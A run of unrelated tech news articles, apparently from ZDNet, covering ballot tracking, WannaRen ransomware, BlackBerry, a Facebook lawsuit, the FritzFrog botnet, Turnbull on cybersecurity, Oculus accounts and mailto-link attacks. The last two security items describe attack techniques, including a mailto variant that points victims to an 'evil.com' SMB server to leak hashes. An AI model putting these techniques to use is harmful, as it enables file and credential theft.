Information Technology

As election officials around the country race to ramp up mail-in voting ahead of this November’s general elections, they’re taking a number of steps to ensure their systems run efficiently and securely. Yet even in the best-run systems, there are occasional glitches. 
In Denver County in 2010, for instance, a county official became alarmed when she received a notification that she should have received her ballot in the mail — but it never came. She reached out to Steve Olsen, whose software development firm worked with the city of Denver in 2009 to build a ballot-tracking system. 
“We went with her to the USPS bulk mail processing center, and after a very informative tour and discussion, we were told a pallet of ballots had been pushed aside and forgotten for a few days,” Olsen told ZDNet. 
The missing ballot was in that batch, waiting to be processed. The delay occurred well before election deadlines and ultimately didn’t really impact voters, Olsen said. Still, he argues, the incident underscored how their ballot-tracking application, which was in its pilot phase at the time, could give voters and election officials alike more confidence in mail-in voting. 
More on technology and elections: 
“It did reveal the power of our system to provide visibility and accountability to all parties,” Olsen said. 
Since then, Olsen’s firm has tracked ballots for more than 300 elections across the US with “no other incidents or concerns,” he said, nor has it had any security breaches. 
Creating a sense of accountability may be one of the hardest parts of establishing a mail-in voting system this year, as President Trump seeks to undermine the process. 
The state of Michigan, for instance, has been preparing for a deluge of mail-in ballots — mail-in voting for the general election is expected to be twice as high as previous records in the state, according to Michigan Secretary of State Jocelyn Benson.

Steve Olsen: “Security is a big deal.”
“We’re prepared, if not over-prepared,” Benson said during a recent online panel discussion. “I’m confident we’re doing everything humanly possible to ensure secure and safe elections in Michigan.” 
That said, she added, “what we can’t control are narratives and misperceptions and disinformation that people with large bully pulpits… will utilize to sow seeds of doubt in the electorate about the sanctity of the process.”
Even without political interference, setting up election infrastructure of any kind is no small task. 
“No voting system is simple—there are particular processes and procedures specific to any method,” Paul Gronke, professor of political science at Reed College and director of the Early Voting Information Center, said in an email to ZDNet. “For example, under mail-in voting, you need procedures to process the volume of mail you are receiving, and in large jurisdictions, that involves specialized hardware, signature verification systems, etc.”
Ballot tracking, he said, is “a useful tool for security, so citizens know when the ballots are sent and returned.”
After working solely with the city of Denver for a few years, Olsen in 2012 spun out his software application into BallotTrax, a multi-tenant system open to different jurisdictions. The patent-pending BallotTrax is one of two ballot-tracking systems commonly used in the US, along with Ballot Scout, a web application developed by the nonprofit organization Democracy Works.

A few years ago, Olsen moved BallotTrax to Amazon Web Services for a number of reasons, he said, including security and scalability. 
Since the COVID-19 pandemic struck, Olsen said he’s been busy fielding calls from hundreds of counties across the US, as well as from state officials. BallotTrax currently has statewide contracts with Colorado and California, and it has pending contracts in a handful of other states. BallotTrax is also used at the county level in 10 other states across the US, and the firm is working with the National Vote at Home Institute to deploy ballot tracking services in new jurisdictions. 
While BallotTrax’s customers are election administrators, voters are the initial end users of the system. To opt into ballot tracking, voters provide an app or web interface with their name and date of birth, and they pick their preferred method of communication — email, text or voice messaging. The system supports notifications in 14 different languages. 
Election officials can customize the messages that are delivered via BallotTrax, but there are typically about seven different types of notifications that go out. The notifications begin when a ballot is printed and mailed, they can track the ballot through the postal stream, and they alert voters when their ballot is rejected or accepted by election officials. 
BallotTrax relies on three different data streams. First, it consumes voter record data coming from the state, such as eligibility files and voter registration information. Next, the system uses data from the US Postal Service’s Intelligent Mail barcodes, which anyone can subscribe to in order to track pieces of mail. Lastly, BallotTrax uses data it receives from the printing vendor when a ballot is created. 
See also: Voting during 2020 election: What you need to know about vote by mail, online ballots, polling places CNET
The first category of data, collected from the state, is updated three or four times a day, Olsen said. BallotTrax uses fully encrypted FTP sites to transfer the data — it’s encrypted in transit and at rest and protected by redundant firewalls. Olsen said the application’s code is tested every hour, and the company actively monitors for threats using a variety of industry-standard tools.
The software is in compliance with NIST 800-171 standards for government contractors, and BallotTrax is a member of the Elections Infrastructure Information Sharing and Analysis Center. 
“Security is a big deal,” Olsen said. “We’re only processing voter registration data which is kind of available in lots of places, but we recognize that voting and elections are of paramount importance to voters. We don’t sell their data, we don’t store their data afterwards — it’s consumed, messages are sent out, and then it’s deleted.”
A number of the alleged concerns about fraud and tampering with mailed-in ballots can be mitigated with tracking, Olsen contends. For instance, the Trump administration and the GOP have raised objections in court to the practice of “ballot harvesting” — letting a third party pick up and submit your ballot for you. Along the same lines, Trump has railed against mail-in voting, claiming that “mail boxes will be robbed.”
However, Olsen said, if a voter “mailed their ballot back but they never get a notification it’s been accepted, then they know something’s wrong, and they can alert the election office.” Or if a voter’s signature doesn’t match their signature on record, a quick BallotTrax notification “gives you some time to cure it.”
“I don’t see how most of those arguments are valid if a state takes the time and effort to go through adding ballot tracking and transparency,” he said. 
The system has additional benefits for election administrators. While voters must opt in to receive notifications, administrators can use a BallotTrax dashboard to track all mailed ballots within their jurisdiction. As the incident in Denver in 2010 illustrated, officials can use that visibility “to find out if there are issues in the postal stream that may become impactful later,” Olsen said. 
Election officials can also use the BallotTrax dashboard to gain insight into voter turnout and demographic trends. 
Meanwhile, both voters and election officials benefit simply from a greater sense of confidence in the process, Olsen said. Back in Denver, before ballot tracking was deployed, election officials were receiving calls from around one out of every four voters inquiring about their mailed-in ballots, Olsen said. After tracking was implemented, only around one out of every 20 voters called in. 
“We were answering voters’ concerns before they even asked,” Olsen said. 

Coronavirus More

Image: QiAnXin

A major ransomware outbreak hit Chinese internet users earlier this year in April. For about a week, a ransomware strain known as WannaRen made tens of thousands of victims among both home consumers and local Chinese and Taiwanese companies.
Looking back, in retrospect, four months later, WannaRen’s virality can be explained due to the fact that its code was loosely modeled after WannaCry, the ransomware strain at the heart of the May 2017 global outbreak.
Just like their inspiration, the authors of the WannaRen ransomware incorporated the EternalBlue exploit into their infection chain, allowing WannaRen to spread without restrictions inside corporate networks before encrypting and ransom files.
And just like WannaCry, WannaRen spread like wildfire, far beyond what the ransomware’s authors had intended, creating more havoc than they anticipated, and the reason why, in the end, the malware’s authors gave up the master decryption key for free, so all victims could eventually recover their files.
The Hidden Shadow malware group
More than three years after it happened, we can now say for sure that WannaCry was created by North Korean government hackers as a way to infect a few victims, ransom their files, and use the ransom payments to raise funds for the Pyongyang regime. WannaCry authors never had big ambitions, and causing a global outbreak was never their intent, as this only brought more attention to their illicit sanctions-evading and criminal activities.
However, something similar can also be said for the authors of the WannaRen ransomware, a group that Chinese antivirus maker Qihoo 360 said it’s been tracking under the name of Hidden Shadow.
Described as a small-time threat actor, this group has been active for years, being involved in the distribution of an assortment of malware strains, usually via pirated software download sites.
Past operations involved the distribution of password-stealers, keyloggers, remote access trojans, and cryptocurrency-mining malware.
WannaRen was added to the group’s arsenal and incorporated into their distribution routine on April 4, this year.
According to multiple sources, WannaRen’s initial point of distribution was a modified installer for the Notepad++ text editor that was shared via the Xixi Software Center.

Image via ITnews
Because access to the official Notepad++ download site is often blocked in China due to the software maker’s anti-Chinese stance, and because Xixi is one of China’s largest software download sites, infections with WannaRen spike right away.
Thousands of Chinese internet users began asking for help decrypting their files on Chinese forums, social networks, and online chats, starting with the first day when WannaRen infections started getting detected, according to local press.
Hidden Shadow malware spread laterally across networks
While many users were home consumers, many asking for help were IT admins managing corporate networks, where WannaRen was particularly aggressive.
This was likely due to WannaRen’s infection routine.
On computers where users installed this booby-trapped version of Notepad++, the installer dropped a backdoor trojan, deployed the EternalBlue exploit to spread laterally across a network (via SMBv1), and used a PowerShell script to download and install the WannaRen ransomware or a Monero-mining module.

Image: Qihoo 360
Once it locked users’ computers, the ransomware would show a ransom note portraying North Korean dictator Kim Jong-un, and ask users to pay a decryption fee of 0.05 bitcoin (~$550) to decrypt their files.
All computers hit by this ransomware were pretty easy to spot, as all encrypted files had their names appended with the “.wannaren” extension.

Image via Weibo
WannaRen authors give out their own decryption key
From the pretty niche distribution method and the low ransom demand, it was pretty clear from the get-go that the Hidden Shadow group had not intended for their ransomware to spread so widely and so fast.
Likely fearing or anticipating a crackdown from Chinese authorities, less than a week after they started distributing WannaRen, the Hidden Shadow group reached out to a local Chinese cybersecurity firm named Huorong Security (火绒, or Tinder Security).
In a series of emails the company shared online, the WannaRen authors shared the ransomware’s private encryption key (also known as a master decryption key) with Huorong’s staff, asking the company to create and share a free decryption utility with infected victims.

Image: Huorong Security
On the same day, on April 9, Huorong released its WannaRen decryption utility, followed a few hours later by a similar decryption utility created by RedDrip, a cyber-security division inside QiAnXin Technology, which has also been tracking the ransomware’s rapid spread across China.
However, while the vast majority of WannaRen users were in China, the ransomware’s extreme virality also allowed it to spread via internal networks from Chinese subsidiaries to some foreign companies as well.
Since not all these companies might be aware that there is a free decryption tool available, or they might not trust the tools created by the two Chinese security vendors, today, Romanian antivirus maker Bitdefender also released its own WannaRen decryption utility.
At the time of writing, WannaRen infections appear to have died out, but victims who may have copies of files encrypted by this threat back in April can now decrypt them for free. More

In the beginning, there were BlackBerrys, email appliances that opened the world’s eyes to mobile data. Then came the second-generation BlackBerrys built on a new, short-lived operating system, BlackBerry 10. When the company exited the smartphone business and licensed the Blackberry name to TCL, we saw the third-generation BlackBerrys built on Android. And, next year, we will see what may be the fourth generation of the pioneering mobile phone brand courtesy a startup called OnwardMobility that has replaced TCL as the Blackberry brand licensee.

How much of a break the new BlackBerrys make from the previous Android versions, particularly if TCL had been allowed to move forward, is yet unknown. OnwardMobility says that its first new BlackBerry set to debut in the first half of 2021 will support 5G. Beyond that, it will have a physical keyboard, run on Android, and focus on security and privacy as products — all traits of products that TCL produced. Both traditional physical keyboards and newfangled folding screens, though, offer many ways to differentiate. (TCL seems keen on the latter, having shown off several, mostly non-functional, prototypes of devices with folding and even rolling displays last year.)
The keyboard is the thornier issue. On TCL’s final Blackberry, the Key2, the company boasted that its keys had been enlarged over its predecessor. While its keyboard is usable, even efficient with practice, it faces tough competition from large smartphones that offer adequate spacing for screen-based keyboards. The Surface Duo and the LG Velvet (when equipped with its second-screen accessory) can even dedicate a whole screen to the keyboard. As smartphone screens grew to better accommodate a thumb-typing experience, I once thought that, while the efficiency may be comparable between physical keys and glass typing, the former felt better with its tactile response. But by the time Android-based BlackbBrrys arrived, the reverse felt true.
Even if the next BlackBerry creates best-in-class smartphone keyboard efficacy (which today belongs to the Planet Computers products), it still must allocate room for the keyboard. That requires either reducing the screen size (as in the Key2) or making a two-decked device (as in the F(x)Tec 1 or the Planet Computers’ Astro Slide, which is also due with 5G in the first half of next year). Some BlackBerry fans online have said they would welcome an updating of the Priv, a vertical slider with curved edge glass. Here’s where folding or rolling screens could come in handy, potentially creating minimal extra thickness while allowing access to a keyboard and larger display when extended.
When the news of BlackBerry (the company) and TCL parting ways broke earlier this year, I speculated on many of the reasons why BlackBerry might have terminated the agreement. OnwardMobility says one of the things that appealed to the licensor was the new company’s ties to a well-regarded manufacturer. TCL may not have done enough to move the needle on BlackBerry volumes, but that’s been a long-running challenge that OnwardMobility will have to face as well. Retro smartphone brands have had a mixed record. Nokia-licensee HMD has effectively attacked the value segment, Lenovo’s Motorola brand is moving on from its modular Z-series experiment and initial RAZR revival, and startup Palm has stayed quiet since its initial mini-smartphone/companion landed with the thud of a basketball dribbled by backer Steph Curry.
It’s now been almost four years since what was once Research in Motion left the smartphone market after its own long sales decline. 5G phones will be entering the market at a rapid clip next year. To make headway, OnwardMobility will have to extend the brand’s reach and signature input method to smartphone users who have known only typing on glass.
PREVIOUS AND RELATED COVERAGE
With no brand license, Blackberry Mobile fades to black Blackberry’s termination of its brand license to TCL raises questions about what led to the split and whether this is truly the end of a once-dominant phone brand.
BlackBerry phones dead again? TCL to stop making the handsets Sales of devices will end in August.
In a market without keyboards, BlackBerry presses on Early smartphone users cursed the awkwardness of software keyboards. But for BlackBerry to come back, it will need to crack a market that has embraced typing on glass. More

Facebook is being sued for displaying fact-check messages on anti-vaccination posts, with one group claiming that the practice is “censorship.”

Children’s Health Defense (CHD), led by Robert F. Kennedy, Jr., filed the lawsuit on Monday in San Francisco Federal Court. 
In April, faced with an influx of misleading and fake COVID-19 content, the social media giant started notifying users when interacted with misinformation relating to the pandemic, including likes, reactions, or comments. 
See also: Facebook pulls video from Trump’s page labelling it as COVID-19 misinformation
These posts included “cure-all” measures, fake methods to prevent contagion, and conspiracy theories, such as the connection between vaccinations, COVID-19, and 5G. 
In recent months, conspiracy content spread by anti-vaccination groups including claimed connections between 5G and the spread of COVID-19, population microchipping schemes, and the creation of the novel coronavirus as a bioweapon. 
Warnings included alerts and fact-check notices for misleading content and disproven claims, together with links to the Centers for Disease Control and Prevention (CDC) and World Health Organization (WHO) pages.
Facebook, CEO Mark Zuckerberg, and three fact-checking companies hired by the firm to perform checks on hot topics — such as the novel coronavirus, 5G, and vaccines — are accused of “fraudulently misrepresenting and defaming CHD.”
Alongside displaying alerts on CHD content, Facebook also removed the group’s donate button and rejected advertising bids.
CNET: How Intel will keep Moore’s Law cranking for years to come
CHD says in its complaint (.PDF) that Facebook and the US government have teamed up to censor speech, and the company should not be protected as an alleged violator of the First Amendment — which usually does not apply to private companies — as the pair have “privatized” the law. 
“The CDC and, under its aegis, the WHO then collaborated at length with Facebook to suppress vaccine safety speech with a “warning label” and other notices that appear to flag disinformation, but in reality censor valid and truthful speech,” the complaint reads.
TechRepublic: Why Mozilla’s layoffs and Google deal made me rethink my browser of choice
Furthermore, the group claims that Facebook has “insidious conflicts” with pharmaceutical companies, health regulators, and also has a vested interest in the telecom and 5G space. 
CHD is seeking damages beyond $5 million.
ZDNet has reached out to Facebook for comment and will update when we hear back. 

Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

A P2P botnet newly-discovered by researchers has struck at least 500 government and enterprise SSH servers over 2020. 

On Wednesday, cybersecurity firm Guardicore published research into FritzFrog, a peer-to-peer (P2P) botnet that has been detected by the company’s sensors since January this year. 
According to researcher Ophir Harpaz, FritzFrog has attempted to brute-force SSH servers belonging to government, education, financial, medical, and telecom players worldwide over the last eight months. 
The malware was discovered while Harpaz worked on the Botnet Encyclopedia, a free security threat tracker, as reported by sister site TechRepublic. 
See also: For 8 years, a hacker operated a massive IoT botnet just to download Anime videos
A minimum of 500 servers have been breached, including those connected to prominent US and European universities, as well as an unnamed railway company. 
FritzFrog is a decentralized botnet that uses P2P protocols to distribute control over all of its nodes, thereby avoiding having one controller or point-of-failure. 
After brute-forcing an SSH server, the malware deployed on infected systems is fileless and both assembles and executes only in memory — likely in an effort to avoid detection and leave little trace of its presence. According to the team, each infected machine then becomes a bot capable of receiving and executing commands. 
CNET: Secret Service reportedly paid to access phone location data
The FritzFrog malware is written in Golang and over 20 variants have been detected in the wild. Once executed, FritzFrog unpacks malware under the names ifconfig and nginx and sets up shop to listen for commands sent across port 1234. 
However, these commands are usually easy to spot, and so attackers connect to the victim over SSH and run a netcat client instead. 
The first command joins the victim machine to the existing database of network peers and slave nodes. Other commands, all of which are AES encrypted, includes adding a public SSH-RSA key to the authorized_keys file to establish a backdoor, running shell commands to monitor a victim PC’s resources and CPU usage, and network monitoring. 
The malware portion of FritzFrog is also able to propagate over the SSH protocol. 
FritzFrog’s primary goal is to mine for cryptocurrency. XMRig, a Monero miner, is deployed and connected to the public pool web.xmrpool.eu over port 5555.
TechRepublic: Top 5 password hygiene security protocols companies should follow
If processes on the server are hogging CPU resources, the malware may kill them to give the miner as much power as possible. 
FritzFrog will also exchange and share files by splitting content into binary data blobs, keeping them in memory, and storing this data with a map linking each blob’s hash value. 
The P2P protocol used for communication by the botnet is “proprietary,” Guardicore notes, and is “not based on any existing implementation,” such as μTP.
This may suggest that “the attackers are highly professional software developers,” the team says. While there are no concrete clues for attribution, some similarities have been found between FritzFrog and Rakos, a botnet discovered in 2016.

Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Former Prime Minister Malcolm Turnbull
Screenshot: Asha Barbaschow/ZDNet
Former Prime Minister Malcolm Turnbull has said there’s an opportunity to boost Australian talent, if government and large businesses alike moved away from the big end of tech town when procuring services.
“There’s clearly a big opportunity for innovation and we have outstanding cybersecurity professionals in Australia … we should be developing a world-leading cybersecurity industry,” Turnbull said on Wednesday. “The stronger your cybersecurity industry is in Australia, the better your cybersecurity will be.”
He said one of Australia’s biggest weaknesses is a lack of confidence in its own technological skills and a failure on the part of government “despite encouragement from politicians like myself to invest in and with Australian companies”.
“This is where governments I think often slip up — governments and big companies feel comfortable dealing with other big companies, often big systems integrators, foreign-owned. You’ve got to develop a culture where you are prepared to engage with, testbed, try out, do proof of concepts with smaller, younger, Australian companies,” he said.
The country’s 29th Prime Minister spoke alongside Alastair MacGibbon, who prior to heading up his own Australian cybersecurity megamix, CyberCX, was Turnbull’s special advisor on cyber.
Both Turnbull and MacGibbon in 2016 were faced with the failure of tech kit procured from IBM by the Australian Bureau of Statistics (ABS). On Census night, ABS experienced a series of small denial-of-service (DDoS) attacks, suffered a hardware router failure, and baulked at a false positive report of data being exfiltrated, which resulted in the Census website being shut down and citizens unable to complete their online submissions.
“That was a complete failure by IBM … whose face did all the egg end up on? It ended up on mine as the prime minister,” Turnbull said. “That was a classic case of an Australian agency … thinking that if they go with IBM, everything will be all right. You know, no one got fired for buying IBM and insert name of any other one of these big companies.”
See also: Australian government is currently juggling 62 high-cost IT projects
He said it speaks to not having enough technical skills inside government, and also “just being complacent about the big foreign companies”.
“We need to have more confidence in our own capabilities,” he added.
Acknowledging the need for more female representation in the cyber field, he also said anecdotally if the men in cybersecurity were more “congenial”, more women would get involved.
“There is a theory, I honestly — I’m not warranting this — but there is a theory that if the men were more sort of congenial there’d be more women doing cyber subjects. I don’t know. I think it’s a commentary rather than the solution,” he said.
Must read: Revisiting the conversation about tech diversity and inclusion in Australia
Touching on the federal government’s newly released 2020 Cyber Security Strategy, and the level to which government should be involved with the cybersecurity of businesses, Turnbull said he was hesitant to get behind any legislative direction to govern board responsibilities.
“One thing that could be useful is to require companies to formally address it in their annual report,” he said, accepting that such an approach is more of a “box ticking” exercise than a valid metric.
“That is the problem, because with self-regulation, the only way to look at this is that you can’t — the government’s not in a position to do a security audit on every company in Australia. So the only thing you can do is keep talking about it and keep raising awareness of it.”
“What would make a difference was if somebody got sued for not doing a good enough job on their cybersecurity …. and companies need to be very careful about that because if you’re not paying attention to it and your customers incur, also your company incurs, a loss, you might find yourself at the wrong end of a shareholder action.”
End-to-end encryption, Australia vs the US

While the former PM covered 5G and the banning of Huawei, Chelsea Manning and Edward Snowden, and Australia’s relationship with the overseas-based monarchy, he also touched on the subtle differences between Australia and the United States where end-to-end encryption is concerned.
“The arguments about end-to-end encryption are very cogent ones, because if you give, or if you say to WhatsApp or Signal or whatever, ‘you must have a backdoor key to allow lawful interception’, then the fact that that backdoor key exists, means that somebody else sees a vulnerability,” he said.
“Therein lies the risk.”
But further, Turnbull said the “cultural scene” where end-to-end encryption is concerned, differs in Australia to the likes of the US.
“My sense is Australians generally think the government is trying to do the right thing … they sort of feel the government, by and large, has tried to do the right thing. You know, run by stumblebums and incompetence at any given time,” he said.
“But in America, there is both on the right and the left, a really extreme libertarian tendency which sees the government as the enemy.”
He said this culminates in Silicon Valley as a determination to maintain end-to-end encryption.
“It’s quite ideological and baked into it today. It’s baked into their DNA and it’s connected with things like the second amendment and the right to bear arms,” Turnbull said. “It’s a very different mindset.”
RELATED COVERAGE More

Oculus Quest
Those wishing to use an Oculus device will soon be forced to have a Facebook account in order to log into their VR profile.
From October, the Facebook-owned company will require its users to log in via the social media platform and merge any existing Oculus accounts with accounts from Facebook. From January 2023, all un-merged Oculus accounts will be shuttered.
Anyone using an Oculus device for the first time will need a Facebook account to proceed.
“If you’re an existing user and choose not to merge your accounts, you can continue using your Oculus account for two years,” Oculus wrote in a blog post announcing the mandate.
“If you choose not to merge your accounts at that time, you can continue using your device, but full functionality will require a Facebook account. We will take steps to allow you to keep using content you have purchased, though we expect some games and apps may no longer work.”
Oculus said some games and apps may no longer work because they include features that require a Facebook account.
“All future unreleased Oculus devices will require a Facebook account, even if you already have an Oculus account,” it continued.
Oculus is touting the mandate as one making it easier to find, connect, and play with friends in VR.
“We know that social VR has so much more to offer, and this change will make it possible to integrate many of the features people know and love on Facebook,” the post said. “It will also allow us to introduce more Facebook powered multiplayer and social experiences coming soon in VR.”
With the privacy of its users always front of mind for the Zuckerberg empire, users can choose what information about their VR activity is posted to Facebook, Oculus said.
See also: How to protect your privacy from Facebook
“Using a VR profile that is backed by a Facebook account and authentic identity helps us protect our community and makes it possible to offer additional integrity tools,” the post said. “For example, instead of having a separate Oculus Code of Conduct, we will adopt Facebook’s Community Standards as well as a new additional VR-focused policy. This will allow us to continue to take the unique considerations of VR into account while offering a more consistent way to report bad behaviour, hold people accountable, and help create a more welcoming environment across our platforms.”
Oculus said that when a user logs in using a Facebook account, Facebook will use information related to the use of VR and other Facebook products to “provide and improve your experience”. It will also be used to show the user personalised content, including ads.
Facebook this year is ending sales of the Oculus Go, the low-end virtual reality headsets that deliver 3DOF (three degrees of freedom) tracking.
It said it is abandoning the relatively cheap device because users have made it clear “that 6DOF feels like the future of VR”, the company said in June.  
Oculus was scooped up by Facebook in March 2014, for approximately $2 billion.
At the time of the acquisition, Mark Zuckerberg said that while mobile is the platform of today, his company is getting ready for the platforms of tomorrow.
“Oculus has the chance to create the most social platform ever, and change the way we work, play, and communicate.”

MORE FROM THE VR WORLD More

A lesser-known technology known as “mailto” links can be abused to launch attacks on the users of email desktop clients.
The new attacks can be used to secretly steal local files and have them emailed as attachments to attackers, according to a research paper published last week by academics from two German universities.
Attacking mailto links
The “vulnerability” at the heart of these attacks is how email clients implemented RFC6068 — the technical standard that describes the ‘mailto’ URI scheme.
Mailto refer to special types of links, usually supported by web browsers or email clients. These are links that, when clicked, they open a new email compose/reply window rather than a new web page (website).
RFC6068 says that mailto links can support various parameters. When used with mailto links, these parameters will pre-fill the new email window with predefined content.
For example, a mailto link like the one below will open a new email compose window with the destination email already pre-filled with “bob@host.com,” a subject line of “Hello,” and an email text of “Friend.”
Click me!
The RFC6068 (mailto) standard supports a large set of parameters for customizing mailto links, including rarely used options that can be used to control the email’s body text, reply-to email address, and even email headers.
However, even the standard itself warns software engineers against supporting all parameters, recommending that apps only support a few “safe” options.

Image: Müller et al.
Some email clients were supporting dangerous mailto parameters
But in a research paper named “Mailto: Me Your Secrets” [PDF], academics from Ruhr University Bochum and the Münster University of Applied Sciences said they found email client apps that support the mailto standard with some of its most exotic parameters that allow for attacks on their users.
In particular, researchers looked at the mailto “attach” or “attachment” parameters that allow mailto links to open new email compose/reply windows with a file already attached.
Academics argue that attackers can send emails containing boobytrapped mailto links or place boobytrapped mailto links on websites that, when clicked, could surreptitiously append sensitive files to the email window.
If the user composing the email does not spot the file attachment, attackers could receive sensitive files from the user’s system, such as encryption (PGP) keys, SSH keys, config files, cryptocurrency wallet files, password stores, or important business documents — as long as they’re stored at file paths known by an attacker.
Academics said they tested several versions of this data exfiltration technique, such as:
Using exact paths for the desired files.
Using wildcard characters (*) to attach/steal multiple files at once.
Using URLs for internal network shares (\company_domainfile).
Using URLs pointing the victim to an attacker’s rogue SMB server, so the victim leaks its NTLM authentication hash to the attacker (\evil.comdummyfile).
Using IMAP links to steal email messages from a user’s entire IMAP email inbox (imap:///fetch >UID >/INBOX).
The research team said it tested 20 email clients for their attack scenario and found that four clients were vulnerable. This list included:
Evolution, the default email client for the GNOME desktop environment on Linux (see CVE-2020-11879)
KMail, the default email client for KDE desktop environments on Linux (see CVE-2020-11880)
IBM/HCL Notes on Windows (see CVE-2020-4089)
Older versions of Thunderbird on Linux (now patched)
All the found issues were reported to the respective development teams and patched this spring and summer, according to the above-linked CVEs.
Additional research on attacking encrypted PGP and S/MIME
However, the research team’s full paper was not focused on documenting the implementations of the mailto URI scheme in email clients. This is a small portion of the paper that we chose to highlight in this article.
In their paper, academics primarily focused on finding bugs in email clients that could be abused to bypass (not break) email encryption technologies such as PGP and S/MIME.
Researchers said they were successful in finding three new attack techniques that leveraged bugs in email clients to steal PGP private keys from victims, which would then allow attackers to decrypt the victim’s entire communications.
The three new attack classes are listed below, with item 3) being the technique we described above in greater detail (as this technique can be used to steal more than encryption keys, such as all sorts of other files):
Key replacement – Email clients may automatically install certificates contained in S/MIME communications. Such a feature, if available, can be misused to silently replace the public key used to encrypt messages to a certain entity.
Dec/Sig oracles – Using standard mailto parameters, email clients can be tricked to decrypt ciphertext messages or to sign arbitrary messages, and exfiltrate them to an attacker-controlled IMAP server, if the email client supports automatically saving message drafts.
Key exfiltration – If implemented by the email client, an attacker can create a specially crafted mailto URI scheme, in order to force the inclusion of the OpenPGP private key file on disk into an email to be sent back to the attacker.
All in all, academics said that eight of the 20 email clients they tested for their research project were vulnerable to at least one of the three attacks listed above. Please see the figure and its legend below for a breakdown of what email client apps are vulnerable to what, and how.

Image: Müller et al. More